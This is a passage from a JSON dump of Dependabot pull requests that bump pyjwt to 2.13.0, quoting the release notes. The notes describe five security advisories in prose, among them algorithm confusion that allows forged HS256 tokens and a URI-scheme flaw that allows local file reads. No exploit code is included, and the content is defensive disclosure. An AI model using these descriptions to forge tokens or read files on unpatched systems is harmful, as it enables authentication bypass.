\u003ccode\u003ePyJWK\u003c/code\u003e. An attacker who controlled a registered JWKS key could sign with one algorithm and advertise another on the header. PyJWT now requires the token header \u003ccode\u003ealg\u003c/code\u003e to match the \u003ccode\u003ePyJWK\u003c/code\u003e's algorithm before verification. \u003cem\u003eReported by \u003ca href=\"https://github.com/sushi-gif\"\u003e\u003ccode\u003e@​sushi-gif\u003c/code\u003e\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003e\u003cstrong\u003e\u003ca href=\"https://github.com/jpadilla/pyjwt/security/advisories/GHSA-w7vc-732c-9m39\"\u003e\u003ccode\u003eGHSA-w7vc-732c-9m39\u003c/code\u003e\u003c/a\u003e — DoS via base64 decode of unused payload segment when \u003ccode\u003eb64=false\u003c/code\u003e.\u003c/strong\u003e For detached-payload JWS (\u003ccode\u003eb64=false\u003c/code\u003e), the compact-form payload segment was base64-decoded before being discarded in favor of the caller-supplied \u003ccode\u003edetached_payload\u003c/code\u003e. An attacker could inflate the unused segment to force CPU + memory cost without holding a valid signature. The segment is now required to be empty per RFC 7515 Appendix F, and is no longer decoded. \u003cem\u003eReported by \u003ca href=\"https://github.com/thesmartshadow\"\u003e\u003ccode\u003e@​thesmartshadow\u003c/code\u003e\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003e\u003cstrong\u003e\u003ca href=\"https://github.com/jpadilla/pyjwt/security/advisories/GHSA-993g-76c3-p5m4\"\u003e\u003ccode\u003eGHSA-993g-76c3-p5m4\u003c/code\u003e\u003c/a\u003e — \u003ccode\u003ePyJWKClient\u003c/code\u003e accepts non-HTTP(S) URIs.\u003c/strong\u003e \u003ccode\u003ePyJWKClient.fetch_data\u003c/code\u003e passed its URI to \u003ccode\u003eurllib.request.urlopen\u003c/code\u003e, which by default also handles \u003ccode\u003efile://\u003c/code\u003e, \u003ccode\u003eftp://\u003c/code\u003e, and \u003ccode\u003edata:\u003c/code\u003e schemes. An application that fed an attacker-influenced URI into \u003ccode\u003ePyJWKClient\u003c/code\u003e could be coerced into reading local files or reaching other unintended schemes. \u003ccode\u003ePyJWKClient\u003c/code\u003e now rejects any URI whose scheme isn't \u003ccode\u003ehttp\u003c/code\u003e or \u003ccode\u003ehttps\u003c/code\u003e. \u003cem\u003eReported by \u003ca href=\"https://github.com/KEIJOT\"\u003e\u003ccode\u003e@​KEIJOT\u003c/code\u003e\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003e\u003cstrong\u003e\u003ca href=\"https://github.com/jpadilla/pyjwt/security/advisories/GHSA-fhv5-28vv-h8m8\"\u003e\u003ccode\u003eGHSA-fhv5-28vv-h8m8\u003c/code\u003e\u003c/a\u003e — \u003ccode\u003ePyJWKClient\u003c/code\u003e cache wiped on fetch error.\u003c/strong\u003e A \u003ccode\u003efinally\u003c/code\u003e-block \u003ccode\u003eput(jwk_set=None)\u003c/code\u003e cleared the JWK Set cache whenever a fetch raised, turning a transient JWKS-endpoint outage into application-wide auth failure. The cache write was moved into the success path; transient errors no longer evict valid cached keys. \u003cem\u003eReported by \u003ca href=\"https://github.com/eddieran\"\u003e\u003ccode\u003e@​eddieran\u003c/code\u003e\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eFixed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eReject empty HMAC keys outright in \u003ccode\u003eHMACAlgorithm.prepare_key\u003c/code\u003e with \u003ccode\u003eInvalidKeyError\u003c/code\u003e instead of accepting them with only a warning. Defends against the \u003ccode\u003eos.getenv(\u0026quot;JWT_SECRET\u0026quot;, \u0026quot;\u0026quot;)\u003c/code\u003e footgun. \u003cem\u003eThanks to \u003ca href=\"https://github.com/SnailSploit\"\u003e\u003ccode\u003e@​SnailSploit\u003c/code\u003e\u003c/a\u003e and \u003ca href=\"https://github.com/spartan8806\"\u003e\u003ccode\u003e@​spartan8806\u003c/code\u003e\u003c/a\u003e for the reports.\u003c/em\u003e\u003c/li\u003e\n\u003cli\u003eForward per-call \u003ccode\u003eoptions\u003c/code\u003e (including \u003ccode\u003eenforce_minimum_key_length\u003c/code\u003e) from \u003ccode\u003ePyJWT.decode\u003c/code\u003e through to \u003ccode\u003ePyJWS._verify_signature\u003c/code\u003e. The option was previously silently dropped between the two layers, so it only took effect when set on the \u003ccode\u003ePyJWT\u003c/code\u003e instance. \u003cem\u003eThanks to \u003ca href=\"https://github.com/WLUB\"\u003e\u003ccode\u003e@​WLUB\u003c/code\u003e\u003c/a\u003e for the report.\u003c/em\u003e\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eRFC 7797 §3 compliance for \u003ccode\u003eb64=false\u003c/code\u003e:\u003c/strong\u003e the encoder now auto-adds \u003ccode\u003e\u0026quot;b64\u0026quot;\u003c/code\u003e to \u003ccode\u003ecrit\u003c/code\u003e, and the decoder rejects tokens that set \u003ccode\u003eb64=false\u003c/code\u003e without listing it in \u003ccode\u003ecrit\u003c/code\u003e. \u003cem\u003eThanks to \u003ca href=\"https://github.com/MachineLearning-Nerd\"\u003e\u003ccode\u003e@​MachineLearning-Nerd\u003c/code\u003e\u003c/a\u003e for the report.\u003c/em\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eChanged\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eMigrate the \u003ccode\u003edev\u003c/code\u003e, \u003ccode\u003edocs\u003c/code\u003e, and \u003ccode\u003etests\u003c/code\u003e package extras to dependency groups, by \u003ca href=\"https://github.com/kurtmckee\"\u003e\u003ccode\u003e@​kurtmckee\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/jpadilla/pyjwt/pull/1152\"\u003e#1152\u003c/a\u003e.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eUpgrade notes\u003c/h2\u003e\n\u003cp\u003eMost fixes are invisible to correctly-configured callers. A few behavioral changes you may encounter:\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eEmpty HMAC keys now raise.\u003c/strong\u003e If your app passed \u003ccode\u003e\u0026quot;\u0026quot;\u003c/code\u003e or \u003ccode\u003eb\u0026quot;\u0026quot;\u003c/code\u003e as a secret (often via a missing env var, e.g. \u003ccode\u003eos.getenv(\u0026quot;JWT_SECRET\u0026quot;, \u0026quot;\u0026quot;)\u003c/code\u003e), \u003ccode\u003eencode\u003c/code\u003e/\u003ccode\u003edecode\u003c/code\u003e will now raise \u003ccode\u003eInvalidKeyError\u003c/code\u003e. This is the intended behavior — fix the configuration.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003e\u003ccode\u003ePyJWK\u003c/code\u003e decoding now requires the token's \u003ccode\u003ealg\u003c/code\u003e to match the JWK's algorithm.\u003c/strong\u003e Previously a mismatch was silently honored if the header \u003ccode\u003ealg\u003c/code\u003e appeared in the allow-list. Tokens that relied on this mismatch will now fail with \u003ccode\u003eInvalidAlgorithmError\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003e\u003ccode\u003ePyJWKClient\u003c/code\u003e now rejects non-HTTP(S) URIs at construction time.\u003c/strong\u003e Tests or dev environments that fetched JWKS from \u003ccode\u003efile://\u003c/code\u003e URIs need to switch to a local HTTP server or load the JWKS by other means (e.g. construct \u003ccode\u003ePyJWKSet.from_dict(...)\u003c/code\u003e directly).\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003e\u003ccode\u003eb64=false\u003c/code\u003e tokens are now strictly RFC 7515 / 7797 compliant.\u003c/strong\u003e Tokens with a non-empty compact-form payload segment, or that omit \u003ccode\u003e\u0026quot;b64\u0026quot;\u003c/code\u003e from \u003ccode\u003ecrit\u003c/code\u003e, will be rejected. PyJWT-produced tokens always satisfy both invariants, so round-trips through PyJWT are unaffected.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003e\u003ccode\u003eenforce_minimum_key_length\u003c/code\u003e set per-call now takes effect.\u003c/strong\u003e Callers who passed \u003ccode\u003eoptions={\u0026quot;enforce_minimum_key_length\u0026quot;: True}\u003c/code\u003e to \u003ccode\u003ejwt.decode()\u003c/code\u003e previously got no enforcement; they will now get \u003ccode\u003eInvalidKeyError\u003c/code\u003e on undersized keys, as documented.\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull changelog:\u003c/strong\u003e \u003ca href=\"https://github.com/jpadilla/pyjwt/compare/2.12.1...2.13.0\"\u003ehttps://github.com/jpadilla/pyjwt/compare/2.12.1...2.13.0\u003c/a\u003e\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/jpadilla/pyjwt/blob/master/CHANGELOG.rst\"\u003epyjwt's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e\u003ccode\u003ev2.13.0 \u0026lt;https://github.com/jpadilla/pyjwt/compare/2.12.1...2.13.0\u0026gt;\u003c/code\u003e__\u003c/h2\u003e\n\u003cp\u003eSecurity\u003c/p\u003e\n\u003cpre\u003e\u003ccode\u003e\n- Reject JWK JSON documents passed as raw HMAC secrets in\n  ``HMACAlgorithm.prepare_key`` to close an algorithm-confusion gap that\n  the existing PEM/SSH guard did not cover. Reported by @aradona91 in\n  `GHSA-xgmm-8j9v-c9wx \u0026lt;https://github.com/jpadilla/pyjwt/security/advisories/GHSA-xgmm-8j9v-c9wx\u0026gt;`__.\n- Bind the JWT header ``alg`` to ``PyJWK.algorithm_name`` during\n  verification so the caller's ``algorithms=[...]`` allow-list cannot be\n  bypassed when decoding with a ``PyJWK`` / ``PyJWKClient`` key. Reported\n  by @sushi-gif in `GHSA-jq35-7prp-9v3f \u0026lt;https://github.com/jpadilla/pyjwt/security/advisories/GHSA-jq35-7prp-9v3f\u0026gt;`__.\n- Reject non-``http(s)`` URI schemes in ``PyJWKClient`` so attacker-\n  influenced URIs cannot read local files or reach unintended schemes via\n  urllib's default ``file://`` / ``ftp://`` / ``data:`` handlers. Reported\n  by @KEIJOT in `GHSA-993g-76c3-p5m4 \u0026lt;https://github.com/jpadilla/pyjwt/security/advisories/GHSA-993g-76c3-p5m4\u0026gt;`__.\n- Preserve the cached JWK Set on fetch errors in ``PyJWKClient.fetch_data``.\n  The previous ``finally``-block ``put(None)`` pattern cleared the cache\n  on any transient outage, turning one bad JWKS request into application-\n  wide auth failure. Reported by @eddieran in `GHSA-fhv5-28vv-h8m8 \u0026lt;https://github.com/jpadilla/pyjwt/security/advisories/GHSA-fhv5-28vv-h8m8\u0026gt;`__.\n- Skip the unconditional base64 decode of the compact-form payload segment\n  when ``b64=false`` is set in the protected header, and require that\n  segment to be empty (RFC 7515 Appendix F detached form). Closes an\n  unauthenticated DoS amplifier. Reported by @thesmartshadow in\n  `GHSA-w7vc-732c-9m39 \u0026lt;https://github.com/jpadilla/pyjwt/security/advisories/GHSA-w7vc-732c-9m39\u0026gt;`__.\n\u003cp\u003eFixed\u003c/p\u003e\n\u003cpre\u003e\u003ccode\u003e\n- Reject empty HMAC keys outright in ``HMACAlgorithm.prepare_key`` with\n  ``InvalidKeyError`` instead of accepting them with only a warning.\n  Thanks to @SnailSploit and @spartan8806 for independently flagging the\n  footgun.\n- Forward per-call ``options`` (including ``enforce_minimum_key_length``)\n  from ``PyJWT.decode`` through to ``PyJWS._verify_signature`` so the\n  option actually takes effect when set at the call site rather than only\n  on the ``PyJWT`` instance. Thanks to @WLUB for the report.\n- RFC 7797 §3 compliance for ``b64=false``: the encoder now auto-adds\n  ``\u0026amp;quot;b64\u0026amp;quot;`` to the ``crit`` header parameter, and the decoder rejects\n  tokens that set ``b64=false`` without listing it in ``crit``. Thanks to\n  @MachineLearning-Nerd for the report.\n\nChanged\n\u003c/code\u003e\u003c/pre\u003e\n\u003cul\u003e\n\u003cli\u003eMigrate the \u003ccode\u003edev\u003c/code\u003e, \u003ccode\u003edocs\u003c/code\u003e, and \u003ccode\u003etests\u003c/code\u003e package extras to dependency groups by \u003ca href=\"https://github.com/kurtmckee\"\u003e\u003ccode\u003e@​kurtmckee\u003c/code\u003e\u003c/a\u003e in \u003ccode\u003e[#1152](https://github.com/jpadilla/pyjwt/issues/1152) \u0026amp;lt;https://github.com/jpadilla/pyjwt/pull/1152\u0026amp;gt;\u003c/code\u003e__\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003ccode\u003ev2.12.1 \u0026amp;lt;https://github.com/jpadilla/pyjwt/compare/2.12.0...2.12.1\u0026amp;gt;\u003c/code\u003e__\n\u0026lt;/tr\u0026gt;\u0026lt;/table\u0026gt;\n\u003c/code\u003e\u003c/pre\u003e\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jpadilla/pyjwt/commit/7144e4534c34810f4525dc4578a32addd8212cff\"\u003e\u003ccode\u003e7144e45\u003c/code\u003e\u003c/a\u003e Apply ruff format\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jpadilla/pyjwt/commit/d2f4bec4963897c0ef96ef64a875894f2c8542ab\"\u003e\u003ccode\u003ed2f4bec\u003c/code\u003e\u003c/a\u003e Restore \u003ccode\u003ecast()\u003c/code\u003e calls with cross-version \u003ccode\u003etype: ignore\u003c/code\u003e for \u003ccode\u003eprepare_key\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jpadilla/pyjwt/commit/22f478cebddd8294259c30f037ecb92b0b348774\"\u003e\u003ccode\u003e22f478c\u003c/code\u003e\u003c/a\u003e Remove redundant casts in \u003ccode\u003eRSAAlgorithm.prepare_key\u003c/code\u003e and `ECAlgorithm.prepare...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jpadilla/pyjwt/commit/95791b1759b8aa4f2203575d344d5c78564cdc81\"\u003e\u003ccode\u003e95791b1\u003c/code\u003e\u003c/a\u003e Bundle security fixes and hardening into 2.13.0\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jpadilla/pyjwt/commit/dcc27a9d3182a2349c30b160758785c6ce7a6508\"\u003e\u003ccode\u003edcc27a9\u003c/code\u003e\u003c/a\u003e [pre-commit.ci] pre-commit autoupdate (\u003ca href=\"https://redirect.github.com/jpadilla/pyjwt/issues/1155\"\u003e#1155\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jpadilla/pyjwt/commit/9d08a9a1896845ed8eaf88e6f6ac61e5800c3e7a\"\u003e\u003ccode\u003e9d08a9a\u003c/code\u003e\u003c/a\u003e [pre-commit.ci] pre-commit autoupdate (\u003ca href=\"https://redirect.github.com/jpadilla/pyjwt/issues/1146\"\u003e#1146\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jpadilla/pyjwt/commit/b87c10014d4109f0214fea188d00faaaf8a80e64\"\u003e\u003ccode\u003eb87c100\u003c/code\u003e\u003c/a\u003e Bump codecov/codecov-action from 5 to 6 (\u003ca href=\"https://redirect.github.com/jpadilla/pyjwt/issues/1154\"\u003e#1154\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jpadilla/pyjwt/commit/40e3147eb5f790d8d041772e5fc00728a176c812\"\u003e\u003ccode\u003e40e3147\u003c/code\u003e\u003c/a\u003e Migrate development extras to dependency groups (\u003ca href=\"https://redirect.github.com/jpadilla/pyjwt/issues/1152\"\u003e#1152\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eSee full diff in \u003ca href=\"https://github.com/jpadilla/pyjwt/compare/2.12.1...2.13.0\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\n\nDependabot will resolve any conflicts with this PR as long as you don't alter it yourself. You can also trigger a rebase manually by commenting `@dependabot rebase`.\n\n[//]: # (dependabot-automerge-start)\n[//]: # (dependabot-automerge-end)\n\n---\n\n\u003cdetails\u003e\n\u003csummary\u003eDependabot commands and options\u003c/summary\u003e\n\u003cbr /\u003e\n\nYou can trigger Dependabot actions by commenting on this PR:\n- `@dependabot rebase` will rebase this PR\n- `@dependabot recreate` will recreate this PR, overwriting any edits that have been made to it\n- `@dependabot show \u003cdependency name\u003e ignore conditions` will show all of the ignore conditions of the specified dependency\n- `@dependabot ignore this major version` will close this PR and stop Dependabot creating any more for this major version (unless you reopen the PR or upgrade to it yourself)\n- `@dependabot ignore this minor version` will close this PR and stop Dependabot creating any more for this minor version (unless you reopen the PR or upgrade to it yourself)\n- `@dependabot ignore this dependency` will close this PR and stop Dependabot creating any more for this dependency (unless you reopen the PR or upgrade to it yourself)\n\n\n\u003c/details\u003e","html_url":"https://github.com/ShadowTag-v2/shadowtagai-monorepo-v2/pull/348","url":"https://dependabot.ecosyste.ms/api/v1/hosts/GitHub/repositories/ShadowTag-v2%2Fshadowtagai-monorepo-v2/issues/348","packages_url":"https://dependabot.ecosyste.ms/api/v1/issues/348/packages"},{"uuid":"4636229827","node_id":"PR_kwDOSDePOc7lGuoV","number":18,"state":"closed","title":"chore(deps): update pyjwt requirement from \u003e=2.8.0 to \u003e=2.13.0 in /backend","user":"dependabot[bot]","labels":["dependencies","python"],"assignees":[],"locked":false,"comments_count":2,"pull_request":true,"closed_at":"2026-06-11T01:09:45.000Z","author_association":null,"state_reason":null,"created_at":"2026-06-11T00:53:26.000Z","updated_at":"2026-06-11T01:09:48.000Z","time_to_close":979,"merged_at":null,"merged_by":null,"closed_by":null,"dependency_metadata":{"prefix":"chore(deps): update","packages":[{"name":"pyjwt","old_version":"\u003e=2.8.0","new_version":"\u003e=2.13.0","repository_url":"https://github.com/jpadilla/pyjwt"}],"path":"/backend","ecosystem":"pip"},"body":"Updates the requirements on [pyjwt](https://github.com/jpadilla/pyjwt) to permit the latest version.\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/jpadilla/pyjwt/releases\"\u003epyjwt's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e2.13.0\u003c/h2\u003e\n\u003ch1\u003ePyJWT 2.13.0 — Security Release\u003c/h1\u003e\n\u003cp\u003eThis release bundles five security fixes plus three additional hardening / spec-compliance changes. We recommend all users upgrade.\u003c/p\u003e\n\u003ch2\u003eSecurity\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003e\u003cstrong\u003e\u003ca href=\"https://github.com/jpadilla/pyjwt/security/advisories/GHSA-xgmm-8j9v-c9wx\"\u003e\u003ccode\u003eGHSA-xgmm-8j9v-c9wx\u003c/code\u003e\u003c/a\u003e — JWK JSON accepted as HMAC secret (algorithm confusion).\u003c/strong\u003e \u003ccode\u003eHMACAlgorithm.prepare_key\u003c/code\u003e previously rejected PEM- and SSH-formatted asymmetric keys but did not catch a JWK passed as a raw JSON string. In a verifier configured with both symmetric and asymmetric algorithms in \u003ccode\u003ealgorithms=[…]\u003c/code\u003e and a raw-JSON JWK as the key, an attacker could forge HS256 tokens using the JWK text as the HMAC secret. The guard has been extended to reject any JWK-shaped JSON. \u003cem\u003eReported by \u003ca href=\"https://github.com/aradona91\"\u003e\u003ccode\u003e@​aradona91\u003c/code\u003e\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003e\u003cstrong\u003e\u003ca href=\"https://github.com/jpadilla/pyjwt/security/advisories/GHSA-jq35-7prp-9v3f\"\u003e\u003ccode\u003eGHSA-jq35-7prp-9v3f\u003c/code\u003e\u003c/a\u003e — Algorithm allow-list bypass with \u003ccode\u003ePyJWK\u003c/code\u003e / \u003ccode\u003ePyJWKClient\u003c/code\u003e.\u003c/strong\u003e When verifying with a \u003ccode\u003ePyJWK\u003c/code\u003e, the caller's \u003ccode\u003ealgorithms=[…]\u003c/code\u003e allow-list was checked against the token header \u003ccode\u003ealg\u003c/code\u003e as a string only; actual verification used the algorithm bound to the \u003ccode\u003ePyJWK\u003c/code\u003e. An attacker who controlled a registered JWKS key could sign with one algorithm and advertise another on the header. PyJWT now requires the token header \u003ccode\u003ealg\u003c/code\u003e to match the \u003ccode\u003ePyJWK\u003c/code\u003e's algorithm before verification. \u003cem\u003eReported by \u003ca href=\"https://github.com/sushi-gif\"\u003e\u003ccode\u003e@​sushi-gif\u003c/code\u003e\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003e\u003cstrong\u003e\u003ca href=\"https://github.com/jpadilla/pyjwt/security/advisories/GHSA-w7vc-732c-9m39\"\u003e\u003ccode\u003eGHSA-w7vc-732c-9m39\u003c/code\u003e\u003c/a\u003e — DoS via base64 decode of unused payload segment when \u003ccode\u003eb64=false\u003c/code\u003e.\u003c/strong\u003e For detached-payload JWS (\u003ccode\u003eb64=false\u003c/code\u003e), the compact-form payload segment was base64-decoded before being discarded in favor of the caller-supplied \u003ccode\u003edetached_payload\u003c/code\u003e. An attacker could inflate the unused segment to force CPU + memory cost without holding a valid signature. The segment is now required to be empty per RFC 7515 Appendix F, and is no longer decoded. \u003cem\u003eReported by \u003ca href=\"https://github.com/thesmartshadow\"\u003e\u003ccode\u003e@​thesmartshadow\u003c/code\u003e\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003e\u003cstrong\u003e\u003ca href=\"https://github.com/jpadilla/pyjwt/security/advisories/GHSA-993g-76c3-p5m4\"\u003e\u003ccode\u003eGHSA-993g-76c3-p5m4\u003c/code\u003e\u003c/a\u003e — \u003ccode\u003ePyJWKClient\u003c/code\u003e accepts non-HTTP(S) URIs.\u003c/strong\u003e \u003ccode\u003ePyJWKClient.fetch_data\u003c/code\u003e passed its URI to \u003ccode\u003eurllib.request.urlopen\u003c/code\u003e, which by default also handles \u003ccode\u003efile://\u003c/code\u003e, \u003ccode\u003eftp://\u003c/code\u003e, and \u003ccode\u003edata:\u003c/code\u003e schemes. An application that fed an attacker-influenced URI into \u003ccode\u003ePyJWKClient\u003c/code\u003e could be coerced into reading local files or reaching other unintended schemes. \u003ccode\u003ePyJWKClient\u003c/code\u003e now rejects any URI whose scheme isn't \u003ccode\u003ehttp\u003c/code\u003e or \u003ccode\u003ehttps\u003c/code\u003e. \u003cem\u003eReported by \u003ca href=\"https://github.com/KEIJOT\"\u003e\u003ccode\u003e@​KEIJOT\u003c/code\u003e\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003e\u003cstrong\u003e\u003ca href=\"https://github.com/jpadilla/pyjwt/security/advisories/GHSA-fhv5-28vv-h8m8\"\u003e\u003ccode\u003eGHSA-fhv5-28vv-h8m8\u003c/code\u003e\u003c/a\u003e — \u003ccode\u003ePyJWKClient\u003c/code\u003e cache wiped on fetch error.\u003c/strong\u003e A \u003ccode\u003efinally\u003c/code\u003e-block \u003ccode\u003eput(jwk_set=None)\u003c/code\u003e cleared the JWK Set cache whenever a fetch raised, turning a transient JWKS-endpoint outage into application-wide auth failure. The cache write was moved into the success path; transient errors no longer evict valid cached keys. \u003cem\u003eReported by \u003ca href=\"https://github.com/eddieran\"\u003e\u003ccode\u003e@​eddieran\u003c/code\u003e\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eFixed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eReject empty HMAC keys outright in \u003ccode\u003eHMACAlgorithm.prepare_key\u003c/code\u003e with \u003ccode\u003eInvalidKeyError\u003c/code\u003e instead of accepting them with only a warning. Defends against the \u003ccode\u003eos.getenv(\u0026quot;JWT_SECRET\u0026quot;, \u0026quot;\u0026quot;)\u003c/code\u003e footgun. \u003cem\u003eThanks to \u003ca href=\"https://github.com/SnailSploit\"\u003e\u003ccode\u003e@​SnailSploit\u003c/code\u003e\u003c/a\u003e and \u003ca href=\"https://github.com/spartan8806\"\u003e\u003ccode\u003e@​spartan8806\u003c/code\u003e\u003c/a\u003e for the reports.\u003c/em\u003e\u003c/li\u003e\n\u003cli\u003eForward per-call \u003ccode\u003eoptions\u003c/code\u003e (including \u003ccode\u003eenforce_minimum_key_length\u003c/code\u003e) from \u003ccode\u003ePyJWT.decode\u003c/code\u003e through to \u003ccode\u003ePyJWS._verify_signature\u003c/code\u003e. The option was previously silently dropped between the two layers, so it only took effect when set on the \u003ccode\u003ePyJWT\u003c/code\u003e instance. \u003cem\u003eThanks to \u003ca href=\"https://github.com/WLUB\"\u003e\u003ccode\u003e@​WLUB\u003c/code\u003e\u003c/a\u003e for the report.\u003c/em\u003e\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eRFC 7797 §3 compliance for \u003ccode\u003eb64=false\u003c/code\u003e:\u003c/strong\u003e the encoder now auto-adds \u003ccode\u003e\u0026quot;b64\u0026quot;\u003c/code\u003e to \u003ccode\u003ecrit\u003c/code\u003e, and the decoder rejects tokens that set \u003ccode\u003eb64=false\u003c/code\u003e without listing it in \u003ccode\u003ecrit\u003c/code\u003e. \u003cem\u003eThanks to \u003ca href=\"https://github.com/MachineLearning-Nerd\"\u003e\u003ccode\u003e@​MachineLearning-Nerd\u003c/code\u003e\u003c/a\u003e for the report.\u003c/em\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eChanged\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eMigrate the \u003ccode\u003edev\u003c/code\u003e, \u003ccode\u003edocs\u003c/code\u003e, and \u003ccode\u003etests\u003c/code\u003e package extras to dependency groups, by \u003ca href=\"https://github.com/kurtmckee\"\u003e\u003ccode\u003e@​kurtmckee\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/jpadilla/pyjwt/pull/1152\"\u003e#1152\u003c/a\u003e.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eUpgrade notes\u003c/h2\u003e\n\u003cp\u003eMost fixes are invisible to correctly-configured callers. A few behavioral changes you may encounter:\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eEmpty HMAC keys now raise.\u003c/strong\u003e If your app passed \u003ccode\u003e\u0026quot;\u0026quot;\u003c/code\u003e or \u003ccode\u003eb\u0026quot;\u0026quot;\u003c/code\u003e as a secret (often via a missing env var, e.g. \u003ccode\u003eos.getenv(\u0026quot;JWT_SECRET\u0026quot;, \u0026quot;\u0026quot;)\u003c/code\u003e), \u003ccode\u003eencode\u003c/code\u003e/\u003ccode\u003edecode\u003c/code\u003e will now raise \u003ccode\u003eInvalidKeyError\u003c/code\u003e. This is the intended behavior — fix the configuration.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003e\u003ccode\u003ePyJWK\u003c/code\u003e decoding now requires the token's \u003ccode\u003ealg\u003c/code\u003e to match the JWK's algorithm.\u003c/strong\u003e Previously a mismatch was silently honored if the header \u003ccode\u003ealg\u003c/code\u003e appeared in the allow-list. Tokens that relied on this mismatch will now fail with \u003ccode\u003eInvalidAlgorithmError\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003e\u003ccode\u003ePyJWKClient\u003c/code\u003e now rejects non-HTTP(S) URIs at construction time.\u003c/strong\u003e Tests or dev environments that fetched JWKS from \u003ccode\u003efile://\u003c/code\u003e URIs need to switch to a local HTTP server or load the JWKS by other means (e.g. construct \u003ccode\u003ePyJWKSet.from_dict(...)\u003c/code\u003e directly).\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003e\u003ccode\u003eb64=false\u003c/code\u003e tokens are now strictly RFC 7515 / 7797 compliant.\u003c/strong\u003e Tokens with a non-empty compact-form payload segment, or that omit \u003ccode\u003e\u0026quot;b64\u0026quot;\u003c/code\u003e from \u003ccode\u003ecrit\u003c/code\u003e, will be rejected. PyJWT-produced tokens always satisfy both invariants, so round-trips through PyJWT are unaffected.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003e\u003ccode\u003eenforce_minimum_key_length\u003c/code\u003e set per-call now takes effect.\u003c/strong\u003e Callers who passed \u003ccode\u003eoptions={\u0026quot;enforce_minimum_key_length\u0026quot;: True}\u003c/code\u003e to \u003ccode\u003ejwt.decode()\u003c/code\u003e previously got no enforcement; they will now get \u003ccode\u003eInvalidKeyError\u003c/code\u003e on undersized keys, as documented.\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull changelog:\u003c/strong\u003e \u003ca href=\"https://github.com/jpadilla/pyjwt/compare/2.12.1...2.13.0\"\u003ehttps://github.com/jpadilla/pyjwt/compare/2.12.1...2.13.0\u003c/a\u003e\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/jpadilla/pyjwt/blob/master/CHANGELOG.rst\"\u003epyjwt's 